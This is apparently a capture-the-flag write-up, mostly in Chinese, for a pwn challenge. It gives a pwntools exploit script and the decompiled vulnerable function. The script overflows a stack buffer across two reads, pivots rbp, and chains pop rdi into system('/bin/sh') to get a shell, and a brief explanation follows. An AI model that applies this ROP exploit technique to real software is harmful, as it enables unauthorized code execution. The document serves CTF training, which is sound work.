xuenixiang_2019_pwn_pwn3 wp by Kone
题目链接:pwn3exp:
#-*- coding:utf-8 -*-
from pwn import *
import sys
if len(sys.argv) == 2:
p = process(sys.argv)
elif len(sys.argv) == 3:
p = remote(sys.argv, sys.argv)
else:
print("Usage: exp.py [./a.out | 1.1.1.1 23456]")
exit(1)
"""
__int64 __fastcall main(int a1, char **a2, char **a3)
{
char s; // BYREF
memset(s, 0, sizeof(s));
setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 1, 0LL);
puts("Come on,try to pwn me");
read(0, s, 0x30uLL);
puts("So~sad,you are fail");
return 0LL;
}
"""
sub_system = 0x400751
data_addr = 0x601300
sub_read = 0x400720
system_addr = 0x40075A
pop_rdi_addr = 0x4007d3
p.recvuntil('Come on,try to pwn me\n')
payload = '\x00'*0x10 + p64(data_addr+0x10) + p64(sub_system) + p64(sub_read)
p.sendline(payload)
p.recvuntil('Come on,try to pwn me\n')
payload = '/bin/sh\x00'.ljust(0x18,'\x00') + p64(pop_rdi_addr) + p64(data_addr) + p64(system_addr)
p.sendline(payload)
p.interactive()
总体思路是,栈溢出调用system("/bin/sh"),拿到shell后,获取flag。
2次read,栈溢出。
第1次read:
修改rbp,为存放/bin/sh做准备;
提前调用一次system,解决延迟绑定问题;
再次调用read;
第2次read:
输入/bin/sh,存放到data_addr;
ROP,pop rdi传参
最后call system。
页:
[1]